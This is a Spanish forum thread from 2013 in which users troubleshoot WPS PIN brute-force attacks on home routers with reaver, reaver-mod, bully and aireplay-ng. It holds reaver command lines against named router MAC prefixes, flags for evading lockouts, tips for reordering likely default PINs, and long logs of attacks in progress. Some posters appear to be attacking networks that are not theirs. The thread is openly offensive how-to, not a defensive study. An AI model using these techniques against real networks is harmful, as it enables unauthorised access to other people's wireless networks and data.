¿En serio?  :o
Estas de cachondeo ¿no?
¿Tan complicado es ?

Para poder responderte fregasuelos, hace falta tener los elementos pertinentes  ;) , a saber:

- modelo routeur
- modelo chipset interfaz mode monitor
- versión linux
- versión kernel
- versión driver
- versión aircrack-ng
- versión reaver
- + lo que te parezca relevante (problemas cn USB, conflictos, otros programas que no van, problemas durante loa instalación de reaver, de aircrack-ng etc.. etc..)



Contenido exacto en consolas de >
                                             wash
                                            reaver
              scan airodump-ng con filtro bssid y canal

editando los datos y usando el opción insertar codigó (no hace falta poner todo el log de reaver sino una muestra del fallo)
usar el opción -vv en reaver para obtener mas detalles en salida.

El único reaver modificado es para los routeurs que no respectan el checksum, lee el primer post de este hilo, encontrarás una buena explicación de Weiot sobre el asunto  > wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3   
Ten en cuenta que se trata de un falló de programación por parte del fabricante y no respecto de la norma WPS y que vale para muy pocos modelos




Visto  ;D
Venga fregasuelo, hay diez normas que no han cambiado ¿tan dificil es aplicar esto  :o  ???
Con lo que has puesto en el post que esta en la papelera no dices nada
Y no cuesta nada proporcionar la información mínima. Si al menos se pone con copiado-pegado el resultado de


1 -
Código: [Seleccionar]
airmon-ng
2 - Ataque reaver con la sintaxis empleada

3 - Escaneo wash sobre objetivo

4 - Escaneo airodump-ng sobre objetivo (filtro bssid) con canal fijado (filtro canal)


Así podemos hablar de algo, sino no hay forma, pueden haber cienes de razones.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kyrandio en Mayo 03, 2013, 12:26:59 pm
hola compis, me ocure lo siguiente vamos a ver, me explico, pongo la linea de comando de reaver taltaltal,,,con el pin por defecto que sé...y seguidamente empieza en el 90.91% y sube hasta el 90.96% despues me   pone el famoso WARNING: Detected ap rate limiting tal,tal,tal...pues bien, he probado lo de --ignore-locks, pero lo malo es que no avanza, se queda leyendo por ejemplo 90.91% así todo el rato...no sé si es que hago algo mal,,,pero bueno, pongo lo que yo hago:

reaver -i mon0  xx::xx:xx:xx:xx:xx -p XXXXXXXX -vv --ignore-locks

y asi se puede tirar todo el dia,,,comentar que el ruter está cerquisima..

gracias y espero no molestar y a ver si a alguien mas le ha pasado o si solo me pasa a mi y si puede haber una solucion. saludos.

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 234364 en Mayo 03, 2013, 13:47:23 pm
A mi me sucede exatamente, lo mimo y no he podido encontrar una solucion.. si alquien sabe la alternativa, seria de gran ayuda.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: quillo_lg en Mayo 03, 2013, 15:54:43 pm
la verdad es que no se que modelo d routers son y eso solo puedo decir que reaver solo me funciona con las mac 8c:0c:a3 :(
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kyrandio en Mayo 03, 2013, 16:05:16 pm
me equivoqué al poner aquí ":" de más y el no haber puesto el "-b"...pero realmente si que lo hago bien. saludos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Mayo 03, 2013, 19:22:58 pm
Otra vez lo mismo.....  :P
¿tienes un M5? prueba reaver mod
¿No tienes M5? Pues no estas haciendo nada es un falso positivo

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kyrandio en Mayo 03, 2013, 20:21:17 pm
okkk!! gracias, no si ya lo he parado 30 veces,,e iniciado,,etc,,etc,jejeje, pero nada, no hay forma...kcdtv pues no, pasa hasta el m4 y de ahí,,,no avanza...gracias y saludos compis.-
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Mayo 03, 2013, 20:46:52 pm
podría ser miles de  razones... si metes una captura de pantalla de airodump-ng podemos ver si jay staciones conectados si es problema del RXQ, podría ser problema del chipset, cual es etc etc...
Empieza el attaque sin el opción -p para ver que pasa... 

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: quillo_lg en Mayo 05, 2013, 16:49:36 pm
kcdtv digo que reaver solo me funciona con las redes 8c:0c:a3 con las demás no y me parece raro jajaja nose
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Mayo 05, 2013, 17:58:36 pm
Y si no pones capturas de pantallas y los detalles en consola como se pide poco podremos averiguar para saber que pasa.
Reaver - jumpstat, cualquier cosa que te permite manejar el protocolo WPS, funcionan con muchos mas routeurs que los asl amper.
Tienes un hilo patrón de PIN y las aplicaciones WPSPIN para guiarte y saber que routeurs son vulnerables
Tienes que aprender a entender-manejar reaver para interpretar y remediar a sus fallos.
Y si pones lo que pasa en consola reaver - wash - scan airodump-ng con filtro bssid + canal
Y precisas- chipset - versión aircrack-ng - versión reaver - versión distro
Tenemos casi 100% de la información que necesitamos para guiarte y ayudarte a entender que pasa.  ;)

Citar
solo me funciona con las redes 8c:0c:a3 con las demás no y me parece raro jajaja nose

Si uzas el reaver mod para 8c:0c:a3 sobre redes normales nunca encontraras el PIN... visto que no llevan PIN con checksum,
ESto esta explicado por todas partes, el reaver mod es para redes que no respectan el checksum y de momento el único caso que hemos visto aquí en españa en mas de un año es este solo routeur  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ivano en Mayo 13, 2013, 01:36:23 am
EL reaver tiene un problema, no saca todos los pin, comprobado
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: quillo_lg en Mayo 13, 2013, 04:01:24 am
buenas hay una red Vodafone que solo me da m1 y m2 alcarar que solo m pasa con esta red!!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: quillo_lg en Mayo 14, 2013, 05:15:54 am
ok gracias calorro!!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: el lechero 317 en Mayo 21, 2013, 18:43:30 pm
haz un copiado-pegado del mensaje de error exacto utilizando el opción insertar código.  ;)
Estas en mode live y no tienes mas espacio en la RAM para capturar datos
Te aconsejo de pasar del modo live y instalar en dual boot linux conjuntamente a windows.
Mejor rendimiento, mas estabilidad y podrás hacer sessiones largas sin joder todo.
Te aconsejo linux Mint y seguir los pasos indicados en este tutorial WPS reaver dede 0
sino cualquier versión basada en debian tipo ubuntu es buena para empezar.
saludos kcdtv
          estoy estrenando mi dual boot linux como me recomendaste hace algun tiempo estoy con ubuntu 12.04 todo bien hasta :)  ahora me gusta me falta jugar un rato pero me pregunto como hago ahora con las aplicaciones las sigo corriendo live o las bajo directas aqui empeze por bajar xiaopan 0.4.5 pero no hace nada dice que si lo quiero quemar luego entre una aplicacion iso que tengo en un cd y ni se como abre le doy a todas las carpetas y nada me queda la duda ya tengo linux y buen espacio ahora que ? :'(
ps.no encontraba la konsole y tuve que bajarla viene bajando ahora mismo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Mayo 21, 2013, 23:17:58 pm
tienes un foro linux sistema para todas estas preguntas, no tiene que ver con WPS, abres un tema o colocas tu pregunta en un hilo existente del forum linux sistema.   ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mentolatux en Junio 01, 2013, 17:30:39 pm
Como optener un handshake para descubrir pin(WPS) desde un mac que viene bloqueado cuando ai 0.10%,se ace un dictionaris con numero de ocho pero falta un handshake de pin(WPS)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Junio 01, 2013, 17:51:15 pm
No hay handshake en el protocolo WPS,muevo tu pregunta en el tema general donde podrás leer información sobre ataque sobre protocolo WPS.  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kali-459385 en Junio 03, 2013, 20:26:35 pm
No se sí se habrá tocado el tema, al menos yo no lo he visto.
Una de las cosas más interesantes que se pueden hacer con reaver, es modificar el archivo de donde saca el orden con el que va probando los diferentes pins. Es decir si para un determinado AP tenemos una lista de 15 pins que es probable que funcionen, los pondremos delante del todo para que reaver los pueda probar al principio.

Como he dicho, yo mismo me he creado un ficherito donde tengo toda la lista de pines, pero no ordenada de menor a mayor como lo hace reaver, sino que tengo los primeros 50 o 60 pines que son pines genéricos o pines por defecto. Luego tienen que estar borrados del lugar donde estaban antes, evidentemente.

Todo esto ya lo he automatizado, de manera que cada vez que quiero auditar un AP con wps, busco los patrones y automáticamente se reordena el fichero para colocar los pines más probables delante. Luego los pines de otros AP's vendrán después, y al final del todo los pines que quedan, por orden.

De esta manera se reduce bastante el tiempo de crackeo "medio".
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Novatillo en Julio 29, 2013, 15:17:38 pm
Hola, tengo una duda. ¿El pin wps de la mayoría de routers suele ser el mismo o varía? En caso de que varie ¿qué caracteres son los que son variables (¿los 4 últimos?)?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Julio 29, 2013, 19:19:13 pm

Varía dependiendo del modelo de router / BSSID y Cia aunque se conocen casos de PIN genéricos (ver hilo patrones de PIN WPA). Puede variar por completo dependiendo del algoritmo con que se ha creado
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Novatillo en Agosto 03, 2013, 19:52:27 pm
Tengo unas duditas con el ataque Reaver con estos scripts.

No entiendo por qué en unas AP's el proceso se acelera al 100% en pocos minutos y en otras tarda una eternidad. Actualmente estoy atacando una red en la que empieza a probar pins sin ningún patrón específico; el GOYscript me marca que quedan 10.000 pines restantes y a los pocos segundos empieza sólo a probar con el patrón 1234xxxx, empezando por el porcentaje 90% (pines restantes 1.000). En el caso del Inflator llega al 99% y no encuentra la clave y se mantiene reintentando el último pin todo el rato (el famoso problema de Reaver del 99%). En el GOYscript concluido el patrón 1234 salta el mensaje: "ya se han probado todos los pines que cumplen con la norma 7+1" "buscando segunda mitad del pin omitiendo el dígito checksum", con lo que empieza otro proceso donde prueba uno a uno secuencialmente (a un ratio de 4 segundos/pin) los pines del 12340000 a 12341999 (unos 10.000 pines), lo que me va a llevar cerca de unas 10 horas. No he continuado el ataque porque no me cuadra el asunto. ¿cómo es posible que tanto Inflator como GOYscript tengan tan seguro que la primera mitad del pin es 1234?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: jumeldi en Agosto 03, 2013, 21:21:57 pm
No soy un experto, pero por lo que he leido ahy esta la vulnerabilidad de WPS.
Lo que hace reaver es introducir un pin y el router devuelve un mensaje diciendo que los 4 primeros digitos son incorrectos, Una vez encontrados los 4 primeros ( el router manda un mensjae como que son correctos) busca los 4 siguientes.

Ahy routers que generan el pin sin tener encuenta el cheksum, lo que da el error del 99,99 %.
Aun sin la comprobacion del cheksum los pines posibles ascienden a unos 20.000, espero haberte alludado.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: goyfilms en Agosto 04, 2013, 20:09:41 pm
Efectivamente es como dice jumeldi.
El router sólo te pide el 5º dígito si los 4 anteriores son correctos.
¿Podrías decirnos cual es la primera mitad de la MAC y el PIN completo?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Novatillo en Agosto 04, 2013, 23:28:01 pm
Efectivamente es como dice jumeldi.
El router sólo te pide el 5º dígito si los 4 anteriores son correctos.
¿Podrías decirnos cual es la primera mitad de la MAC y el PIN completo?

Gracias jumeldi, iba a ciegas con mis sesiones de reaver. He buscado por la red y parece que es un falso positivo lo que manda este tipo de APs (o lo que detecta el script), por tanto el patrón 1234xxxx "no tiene salida". Se ha comentado en otros hilos. Es propio de las redes FTE-XXXX. Parece que se soluciona con Reaver 1.3 y algún mod de Reaver, incluso se comenta que hay que cambiar la mac del adaptador.

La mac es 20:F3:A3
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Novatillo en Agosto 15, 2013, 14:29:45 pm
Hola a ver si podéis echarme una mano con el presunto falso positivo M6 de las mac 20:F3:A3 de router WLAN_XXXX (de telefónica me parece) que es un Huawei HG532c 3G.

He probado de todo con esta mac. Siempre desde 0. Inflator, GOYscript, Reaver 1.4, Reaver 1.3 y siempre me manda todos los M del 1 al 6. Como comenté en otros mensajes el patrón que me da Inflator y GOYscript (me manda al 90% enseguida) 1234 no da con la clave, ni aun comprobado los pines que no cumplen la norma del ckecksum, por lo que supongo que el patrón 1234 es un falso positivo, que no sé si es un mecanismo de seguridad del router, o un bug de reaver.

El caso es que con Reaver 1.3 que prueba pines aleatorios también se queda atascado en el 90% dando distintos patrones que supongo ninguno es el correcto. En una primera sesión se quedó atascado en el patrón 3322xxxx, y en una segunda sesión se quedó igualmente atascado el el patrón 7441xxxx. Vamos que este router es un tocahuevos o que estas versiones de Reaver no sirven para esta mac.

Lo único que me falta por probar es el Xiaopan DualReaver de notepad (alias reavermod) y no sé si habrá alguna otra herramienta.

Me acuerdo perfectamente y postear en varios hilos la misma duda se llama SPAM y es muy mal visto en cualquier foro ( decente )  que sea.  ;)
Este hilo es para hablar de instalación y configuración de reaver no para otros temas ...
El HG532c es vulnerable con reaver.
Se ha respondido varias veces a tu duda
, lee un poco
Una duda se plantea con capturas de pantalla, copiados pegados  y detalles no diciendo "he probado tal y tal y no me funciona".
Inflator y esto son solo script o gui que usan reaver, aprenda a manejar reaver y entender lo que es en lugar de perder tu tiempo en hacer la misma cosa con interfaces diferentes, ganaras tiempo y te aclaras.
lee en el hilo sobre WPS, haz el esfuerzo de plantear y presentar tus problemas correctamente; hemos explicado muchas  veces como se hace para plantear un "problema" con reaver y es todo menos como lo haces.  ;)
Intenta entender lo que haces en lugar de hacer sin entender, ya veras como van mejor las cosas
ya sabes, volver a hacer el mismo post en otro hilo y este acabara automáticamente en la papelera

Las capturas en cuanto pueda las subo.  kcdtv dices que este router es vulnerable, pero por lo que he leído en el foro se ha informado para las redes FTE-XXX, en concreto el WPSPIN, que saca el pin por defecto. Pero no he encontrado en el foro información sobre ataques a un AP HG532c 3G con ESSID WLAN_XXXX con mac 20:F3:A3.

El ataque reaver en los diferentes cripts básicamente es este
Código: [Seleccionar]
reaver -i mon0 -b 20:F3:A3:xx:x:xx -e WLAN_xxxx -c10 -vv
Y el error en el 90%:

Código: [Seleccionar]
90.85% complete @ 2013-08-11 01:11:39 (2 seconds/attempt)
[+] Trying pin 69715228
[+] Trying pin 53275226
[+] Trying pin 81365227
[+] Trying pin 64055220
[+] Trying pin 02765228
[+] 90.89% complete @ 2013-08-11 01:11:50 (2 seconds/attempt)
[+] Trying pin 91235220
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] 90.90% complete @ 2013-08-11 01:12:02 (2 seconds/attempt)
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] 90.90% complete @ 2013-08-11 01:12:13 (2 seconds/attempt)
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] 90.90% complete @ 2013-08-11 01:12:24 (2 seconds/attempt)
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229
[+] Trying pin 74415229


Datos adicionales:
modelo chipset interfaz mode monitor: Realtek 8187L
versión kernel: 3.6.11
intensidad señal: -64

y por que no pruebas Bully a aver que tal te va
Hola, en el bully estoy muy verde. Voy a probar primero con el dualreaver de notepad a ver qué pasa.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Agosto 16, 2013, 23:32:58 pm
Novatillo kcdtv tiene razon el routers es vulnerable al reaver se ha dicho por el foro y por la web prueba con el reaver modificado un saludo a todos y suerte.

[time]Agosto 16, 2013, 23:40:30 pm[/time]
Ahh porcierto si tienes los 4 primeros digitos del pin ya encontrados pruebalo en el reaver mod veras como al final lo consigues animo  :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Novatillo en Agosto 17, 2013, 00:02:19 am
Novatillo kcdtv tiene razon el routers es vulnerable al reaver se ha dicho por el foro y por la web prueba con el reaver modificado un saludo a todos y suerte.

[time]Agosto 16, 2013, 23:40:30 pm[/time]
Ahh porcierto si tienes los 4 primeros digitos del pin ya encontrados pruebalo en el reaver mod veras como al final lo consigues animo  :)

Hola clima-sol. En realidad no tengo ningún patrón puesto que en distintas sesiones y dependiendo del script obtengo el patrón 1234xxxx que como dije tiene el fallo del 99,99% (que debe ser un falso positivo producto de un bug de reaver con este router) o distintos con Reaver 1.3 (en una sesión 3322xxxx y en otra 7441xxxx). Ahí está el problema como no sé el patrón y encima obtengo un falso positivo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Agosto 17, 2013, 00:04:19 am
Pues yo empezaria de nuevo en el mod a ver que pasa en las ampers tambien pasaba lo mismo pero en el mod se soluciono prueba y nos cuentas puede ser quetede distinto pin por que el router al reiniciarlo o apagarlo cambia de pin hay routers que hacen esto de todo puede pasar.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Novatillo en Agosto 17, 2013, 01:40:48 am
Aquí el log de los primeros minutos con revermod de notepad

Código: [Seleccionar]
Reaver v1.4 WiFi Protected Setup Attack Tool - Mod 8c:0c:a3 by 'notepad'                                                                             
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>                                                               
                                                                                                                                                     
[+] Switching mon0 to channel 10                                                                                                                     
[+] Waiting for beacon from 20:F3:A3:                                                                                                     
[+] Associated with 20:F3:A3 (ESSID: WLAN_XXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340000
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340123
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12341111
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12342222
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12343333
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 50.03% complete @ 2013-08-17 00:15:35 (4 seconds/pin)
[+] Trying pin 12344444
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN_xxxx)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12345555
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12346666
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12347777
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12348888
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN_XXXX)
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN_XXXX)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 50.06% complete @ 2013-08-17 00:15:56 (4 seconds/pin)
[+] Trying pin 12349999
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340001
[!] WARNING: Failed to associate with 20:F3:A3: (ESSID: WLAN_)
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN_)
[!] WARNING: Failed to associate with 20:F3:A3: (ESSID: WLAN_)
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN_)
[!] WARNING: Failed to associate with 20:F3:A3: (ESSID: WLAN_)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340002
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340003
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340004
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 50.08% complete @ 2013-08-17 00:16:18 (4 seconds/pin)
[+] Trying pin 12340005
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340006
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340007
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN_)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340008
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340009
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 50.10% complete @ 2013-08-17 00:16:37 (4 seconds/pin)
[+] Trying pin 12340010
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340011
[!] WARNING: Failed to associate with 20:F3:A3: (ESSID: WLAN)
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN)
[!] WARNING: Failed to associate with 20:F3:A3 (ESSID: WLAN)

Me rompe los esquema, el reavermod también se empeña el patrón 1234 al igual que el reaver original. ¿cómo es posible si ya probé anteriormente todos los digitos 1234xxxx checksum y no checksum y ninguno daba el pin?

¿Tendrá algo que ver el mensaje de advertencia: WARNING: Receive timeout occurred?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Agosto 17, 2013, 12:41:22 pm
Citar
¿Tendrá algo que ver el mensaje de advertencia: WARNING: Receive timeout occurred?

A esto se le llama una pregunta retorica.  ;)
 
   
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Agosto 17, 2013, 14:00:22 pm
muy bien pero ya tienes los cuatro primeros digitos del pin el router cambia de pin seguro al apagrlo o reiniciarlo y almejor por eso te sale un pin distinto es raro la verdad lo que te pasa ahora solo queda esperar haber puede ser una proteccion del router que te salga eso no te deberia de salir nada deberia de ser un ataque normal.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Novatillo en Agosto 17, 2013, 17:06:45 pm
A esto se le llama una pregunta retorica.  ;)
 
Y ha esto una respuesta retórica ;)

De repente el router se ha puesto en modo paranoico después del ataque reavermod de anoche, cosa que hasta ahora no me había pasado.

Código: [Seleccionar]
[+] Associated with 20:F3:A3 (ESSID: WLAN_XXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
etc.
etc.
....
!] WARNING: 25 successive start failures

Antes a pesar de los "receive timeout ocurred" el porcentaje de pruebas de pin rogresaba. ¿Si el AP rechaza mis ataques por qué progresaban los intentos de pin?

He intentado otros comandos como -S (pequeños paquetes) -L (ignorar bloqueos), -x (nº paquetes por segundo)
-d (retraso) y con el router en "modo paranoico" no sirven de nada.

Parece que este router no es tan vulnerable como se pensaba....
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Agosto 17, 2013, 20:15:19 pm
Eso me pasaba a mi con las fte de huawei tambien pasaba unos dias y ya pogresaba tambien lo mismo que a ti me paso a mi es que el router tiene como un mecanismo de proteccion tienes que esperar horas o dias o que reinicien el router es como si de repente no tuviera pin asiganado pero si lo tiene engaña.

Agosto 18, 2013, 00:09:28 am
Novatillo cuando se pase el bloqueo ese prueba en bully yo no lo he probado pero a ver como te va puede ser que se te funcione mejor un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Novatillo en Agosto 19, 2013, 13:07:53 pm
Los 2 huaweis con esa mac ambos con el mismo comportamiento "WARNING: Receive timeout occurred". Quizás me he equivocado con el modelo y no sea un HG532c y sí un HG253. Visto el poco rastro que he encontrado por la red de esa determinada mac me hace suponer que no es tan vulnerable como otros modelos.

Intenté realizar una asociación por separado con aireplay y reaver por otro, pero después de un minuto no se sostiene el ataque.

Código: [Seleccionar]
~ # aireplay-ng -1 250 -h 00:C0:CA -a 20:F3:A3 mon0
19:18:56  Waiting for beacon frame (BSSID: 20:F3:A3) on channel 11

19:18:56  Sending Authentication Request (Open System) [ACK]
19:18:56  Authentication successful
19:18:56  Sending Association Request

19:19:01  Sending Authentication Request (Open System)
19:19:01  Authentication successful
19:19:01  Sending Association Request
19:19:01  Association successful :-) (AID: 1)

19:19:15  Got a disassociation packet! (Waiting 3 seconds)

19:19:15  Sending Authentication Request (Open System)
19:19:15  Authentication successful
19:19:15  Sending Association Request

19:19:20  Sending Authentication Request (Open System)
19:19:20  Authentication successful
19:19:20  Sending Association Request

19:19:25  Sending Authentication Request (Open System) [ACK]
19:19:25  Authentication successful
19:19:25  Sending Association Request [ACK]
19:19:25  Association successful :-) (AID: 1)

19:19:39  Got a disassociation packet! (Waiting 3 seconds)

19:19:39  Sending Authentication Request (Open System) [ACK]
19:19:39  Authentication successful
19:19:39  Sending Association Request
19:19:39  Association successful :-) (AID: 1)

19:19:54  Sending keep-alive packet
19:19:55  Got a disassociation packet! (Waiting 3 seconds)

19:19:55  Sending Authentication Request (Open System)

19:19:57  Sending Authentication Request (Open System)

19:19:59  Sending Authentication Request (Open System) [ACK]
19:19:59  Authentication successful
19:19:59  Sending Association Request

19:20:04  Sending Authentication Request (Open System) [ACK]
19:20:04  Authentication successful
19:20:04  Sending Association Request [ACK]
19:20:04  Association successful :-) (AID: 1)

19:20:19  Sending keep-alive packet
19:20:19  Got a disassociation packet! (Waiting 3 seconds)

19:20:19  Sending Authentication Request (Open System)

